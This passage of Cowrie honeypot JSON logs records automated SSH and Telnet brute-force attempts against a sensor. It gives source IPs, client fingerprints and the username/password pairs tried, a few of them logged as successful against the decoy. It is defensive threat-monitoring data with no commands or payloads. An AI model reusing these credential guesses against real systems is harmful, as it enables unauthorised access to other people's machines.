03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:25.825231Z","src_ip":"212.227.235.229","session":"dc3ac3b8e4da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:45:26.872999Z","src_ip":"212.227.235.229","session":"dc3ac3b8e4da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50522,"dst_ip":"1.2.3.4","dst_port":22,"session":"9979e42af92f","protocol":"ssh","message":"New connection: 212.227.235.229:50522 (1.2.3.4:22) [session: 9979e42af92f]","sensor":"my-vps","timestamp":"2025-08-26T03:45:26.898722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:26.899554Z","src_ip":"212.227.235.229","session":"9979e42af92f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.125570Z","src_ip":"212.227.235.229","session":"dc3ac3b8e4da"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":40194,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe230e06e3e6","protocol":"ssh","message":"New connection: 68.183.87.241:40194 (1.2.3.4:22) [session: fe230e06e3e6]","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.177415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.178159Z","src_ip":"68.183.87.241","session":"fe230e06e3e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.432827Z","src_ip":"68.183.87.241","session":"fe230e06e3e6"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.596310Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:27.879835Z","src_ip":"212.227.235.229","session":"9979e42af92f"}
{"eventid":"cowrie.login.failed","username":"usdt","password":"123","message":"login attempt [usdt/123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:45:28.492845Z","src_ip":"68.183.87.241","session":"fe230e06e3e6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:29.751446Z","src_ip":"68.183.87.241","session":"fe230e06e3e6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:45:32.081973Z","src_ip":"212.227.235.229","session":"9979e42af92f"}
{"eventid":"cowrie.session.closed","duration":12.748371362686157,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:33.145986Z","src_ip":"182.119.161.105","session":"49fae4a5ebcf"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":53596,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfb30f26f5b4","protocol":"telnet","message":"New connection: 182.119.161.105:53596 (1.2.3.4:23) [session: cfb30f26f5b4]","sensor":"my-vps","timestamp":"2025-08-26T03:45:33.252209Z"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:33.964788Z","src_ip":"212.227.235.229","session":"9979e42af92f"}
{"eventid":"cowrie.session.closed","duration":12.845246076583862,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:46.097365Z","src_ip":"182.119.161.105","session":"cfb30f26f5b4"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":53912,"dst_ip":"1.2.3.4","dst_port":23,"session":"fac4921a1f47","protocol":"telnet","message":"New connection: 182.119.161.105:53912 (1.2.3.4:23) [session: fac4921a1f47]","sensor":"my-vps","timestamp":"2025-08-26T03:45:46.266994Z"}
{"eventid":"cowrie.session.closed","duration":12.861669540405273,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:59.128594Z","src_ip":"182.119.161.105","session":"fac4921a1f47"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":54232,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e7c9dd7221f","protocol":"telnet","message":"New connection: 182.119.161.105:54232 (1.2.3.4:23) [session: 8e7c9dd7221f]","sensor":"my-vps","timestamp":"2025-08-26T03:45:59.295352Z"}
{"eventid":"cowrie.session.closed","duration":12.800063848495483,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:12.095349Z","src_ip":"182.119.161.105","session":"8e7c9dd7221f"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":54550,"dst_ip":"1.2.3.4","dst_port":23,"session":"824041d024c3","protocol":"telnet","message":"New connection: 182.119.161.105:54550 (1.2.3.4:23) [session: 824041d024c3]","sensor":"my-vps","timestamp":"2025-08-26T03:46:12.300371Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":40364,"dst_ip":"1.2.3.4","dst_port":22,"session":"78c468c6c86d","protocol":"ssh","message":"New connection: 103.217.145.104:40364 (1.2.3.4:22) [session: 78c468c6c86d]","sensor":"my-vps","timestamp":"2025-08-26T03:46:19.673329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:46:19.674195Z","src_ip":"103.217.145.104","session":"78c468c6c86d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:46:19.932779Z","src_ip":"103.217.145.104","session":"78c468c6c86d"}
{"eventid":"cowrie.login.failed","username":"frank","password":"frank","message":"login attempt [frank/frank] failed","sensor":"my-vps","timestamp":"2025-08-26T03:46:21.014506Z","src_ip":"103.217.145.104","session":"78c468c6c86d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:22.278548Z","src_ip":"103.217.145.104","session":"78c468c6c86d"}
{"eventid":"cowrie.session.closed","duration":12.823590278625488,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:25.123878Z","src_ip":"182.119.161.105","session":"824041d024c3"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":54868,"dst_ip":"1.2.3.4","dst_port":23,"session":"39fb46689a90","protocol":"telnet","message":"New connection: 182.119.161.105:54868 (1.2.3.4:23) [session: 39fb46689a90]","sensor":"my-vps","timestamp":"2025-08-26T03:46:25.267909Z"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":32886,"dst_ip":"1.2.3.4","dst_port":22,"session":"088ccbb7f221","protocol":"ssh","message":"New connection: 68.183.87.241:32886 (1.2.3.4:22) [session: 088ccbb7f221]","sensor":"my-vps","timestamp":"2025-08-26T03:46:37.486730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:46:37.487611Z","src_ip":"68.183.87.241","session":"088ccbb7f221"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:46:37.742856Z","src_ip":"68.183.87.241","session":"088ccbb7f221"}
{"eventid":"cowrie.session.closed","duration":12.869448184967041,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:38.137252Z","src_ip":"182.119.161.105","session":"39fb46689a90"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":55196,"dst_ip":"1.2.3.4","dst_port":23,"session":"14fb696a165c","protocol":"telnet","message":"New connection: 182.119.161.105:55196 (1.2.3.4:23) [session: 14fb696a165c]","sensor":"my-vps","timestamp":"2025-08-26T03:46:38.299983Z"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer123","message":"login attempt [deployer/deployer123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:46:38.820089Z","src_ip":"68.183.87.241","session":"088ccbb7f221"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:40.084453Z","src_ip":"68.183.87.241","session":"088ccbb7f221"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56226,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f8414240293","protocol":"ssh","message":"New connection: 212.227.235.229:56226 (1.2.3.4:22) [session: 8f8414240293]","sensor":"my-vps","timestamp":"2025-08-26T03:46:40.138966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:46:40.139954Z","src_ip":"212.227.235.229","session":"8f8414240293"}
{"eventid":"cowrie.session.closed","duration":12.802927494049072,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:46:51.102846Z","src_ip":"182.119.161.105","session":"14fb696a165c"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":55513,"dst_ip":"1.2.3.4","dst_port":23,"session":"8925439b1015","protocol":"telnet","message":"New connection: 182.119.161.105:55513 (1.2.3.4:23) [session: 8925439b1015]","sensor":"my-vps","timestamp":"2025-08-26T03:46:51.325804Z"}
{"eventid":"cowrie.session.closed","duration":12.772449731826782,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:04.098184Z","src_ip":"182.119.161.105","session":"8925439b1015"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":55849,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5f93b8f63d6","protocol":"telnet","message":"New connection: 182.119.161.105:55849 (1.2.3.4:23) [session: e5f93b8f63d6]","sensor":"my-vps","timestamp":"2025-08-26T03:47:04.273025Z"}
{"eventid":"cowrie.session.closed","duration":12.863728761672974,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:17.136659Z","src_ip":"182.119.161.105","session":"e5f93b8f63d6"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":56181,"dst_ip":"1.2.3.4","dst_port":23,"session":"60495dff21c7","protocol":"telnet","message":"New connection: 182.119.161.105:56181 (1.2.3.4:23) [session: 60495dff21c7]","sensor":"my-vps","timestamp":"2025-08-26T03:47:17.285490Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40842,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc729528262","protocol":"ssh","message":"New connection: 212.227.235.229:40842 (1.2.3.4:22) [session: 8dc729528262]","sensor":"my-vps","timestamp":"2025-08-26T03:47:27.656429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:47:28.363817Z","src_ip":"212.227.235.229","session":"8dc729528262"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:47:28.364620Z","src_ip":"212.227.235.229","session":"8dc729528262"}
{"eventid":"cowrie.session.closed","duration":12.78203558921814,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:30.066200Z","src_ip":"182.119.161.105","session":"60495dff21c7"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":56507,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6731847f1f8","protocol":"telnet","message":"New connection: 182.119.161.105:56507 (1.2.3.4:23) [session: e6731847f1f8]","sensor":"my-vps","timestamp":"2025-08-26T03:47:30.259580Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Kirtan@123","message":"login attempt [root/Kirtan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:47:32.287953Z","src_ip":"212.227.235.229","session":"8dc729528262"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:33.044959Z","src_ip":"212.227.235.229","session":"8dc729528262"}
{"eventid":"cowrie.session.closed","duration":12.847880363464355,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:43.107376Z","src_ip":"182.119.161.105","session":"e6731847f1f8"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":56834,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4f8a87257b0","protocol":"telnet","message":"New connection: 182.119.161.105:56834 (1.2.3.4:23) [session: a4f8a87257b0]","sensor":"my-vps","timestamp":"2025-08-26T03:47:43.279454Z"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":35854,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7e2e8756a07","protocol":"ssh","message":"New connection: 68.183.87.241:35854 (1.2.3.4:22) [session: d7e2e8756a07]","sensor":"my-vps","timestamp":"2025-08-26T03:47:47.456525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:47:47.457911Z","src_ip":"68.183.87.241","session":"d7e2e8756a07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:47:47.718312Z","src_ip":"68.183.87.241","session":"d7e2e8756a07"}
{"eventid":"cowrie.login.failed","username":"frank","password":"frank","message":"login attempt [frank/frank] failed","sensor":"my-vps","timestamp":"2025-08-26T03:47:48.799160Z","src_ip":"68.183.87.241","session":"d7e2e8756a07"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:50.090260Z","src_ip":"68.183.87.241","session":"d7e2e8756a07"}
{"eventid":"cowrie.session.closed","duration":12.819339513778687,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:47:56.098726Z","src_ip":"182.119.161.105","session":"a4f8a87257b0"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":57134,"dst_ip":"1.2.3.4","dst_port":23,"session":"d83f37d08301","protocol":"telnet","message":"New connection: 182.119.161.105:57134 (1.2.3.4:23) [session: d83f37d08301]","sensor":"my-vps","timestamp":"2025-08-26T03:47:56.280637Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":40090,"dst_ip":"1.2.3.4","dst_port":22,"session":"db62c81f5274","protocol":"ssh","message":"New connection: 103.217.145.104:40090 (1.2.3.4:22) [session: db62c81f5274]","sensor":"my-vps","timestamp":"2025-08-26T03:48:01.385849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:48:01.387173Z","src_ip":"103.217.145.104","session":"db62c81f5274"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:48:01.657177Z","src_ip":"103.217.145.104","session":"db62c81f5274"}
{"eventid":"cowrie.login.failed","username":"richard","password":"richard123","message":"login attempt [richard/richard123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:48:02.762372Z","src_ip":"103.217.145.104","session":"db62c81f5274"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:04.029700Z","src_ip":"103.217.145.104","session":"db62c81f5274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44134,"dst_ip":"1.2.3.4","dst_port":22,"session":"37910d5b8ac2","protocol":"ssh","message":"New connection: 212.227.235.229:44134 (1.2.3.4:22) [session: 37910d5b8ac2]","sensor":"my-vps","timestamp":"2025-08-26T03:48:06.305991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:48:06.306813Z","src_ip":"212.227.235.229","session":"37910d5b8ac2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"